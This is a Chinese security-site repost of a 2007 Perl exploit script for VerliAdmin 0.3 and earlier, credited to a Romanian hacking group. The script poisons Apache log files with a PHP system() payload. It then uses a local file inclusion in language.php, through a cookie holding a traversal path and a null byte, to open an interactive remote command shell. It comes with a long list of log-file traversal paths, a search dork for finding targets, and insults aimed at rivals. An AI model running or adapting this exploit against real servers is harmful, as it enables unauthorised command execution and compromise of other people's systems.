首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VerliAdmin <= 0.3 (language.php) Local File Inclusion Exploit
来源:http://RST-CREW.NET 作者:Kw3 发布时间:2007-01-04  

#!/usr/bin/perl
#
# VerliAdmin <= 0.3 Remote Command Execution Exploit
# linK : http://bohyn.czechweb.cz/
# d0rk: allinurl:"verliadmin"
#
# (c)od3d and f0unded by Kw3[R]Ln from Romanian Security Team a.K.A http://RST-CREW.NET
# Contact: ciriboflacs[AT]YaHOo.com or SkaskLL@msn.com
#
# Vurnerable Code in language.php: IF($_COOKIE['lang'] != "en")
# {Include "language/".$_COOKIE['lang'].".php";}
#
# PS: fuck CacaBot, psyke and Sad_dreamer.. [top lamerZ]
# t0 psyke[pwn]: "y0ur c0de suqz. y0ur s1t3 suqz. y0u sm3ll 0f sh33p f3c3z. 3y3 th1nk y0u n33d t0
# t4k3 4n 0nl1n3 w3b d3s1gn c0urz3 0r s0m3th1ng. fuqn d0rk."


use IO::Socket;
use LWP::Simple;


@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

print "[RST] VerliAdmin <= 0.3 Remote Command Execution Exploit\n";
print "[RST] need magic_quotes_gpc = off\n";
print "[RST] c0ded by Kw3rLN from Romanian Security Team [ http://rst-crew.net ] \n\n";


if (@ARGV < 3)
{
print "[RST] Usage: VerliAdmin.pl [host] [path] [apache_path]\n\n";
print "[RST] Apache Path: \n";
$i = 0;
while($apache[$i])
{ print "[$i] $apache[$i]\n";$i++;}
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "[RST] Injecting some code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "[RST] Shell!! write q to exit !\n";
print "[RST] IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "q") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";

print $socket "GET ".$path."language.php HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Cookie: lang=".$apache[$apachepath]."%00&cmd=$cmd\r\n";
print $socket "Connection: close\r\n\n";

while ($raspuns = <$socket>)
{
print $raspuns;
}

print "[shell] ";
$cmd = <STDIN>;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Quicktime (rtsp URL Hand
·Simple Web Content Management
·Microsoft Vista (NtRaiseHardEr
·Acunetix WVS <= 4.0 2006071
·iLife iPhoto Photocast (XML ti
·CA BrightStor ARCserve (tapeen
·Mac OS X 10.4.8 DiskManagement
·Mac OS X 10.4.8 DiskManagement
·L2J Statistik Script <= 0.0
·NaviCOPA Web Server 2.01 (GET)
·Wordpress 2.0.5 Trackback UTF-
·AllMyLinks <= 0.5.0 (index.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved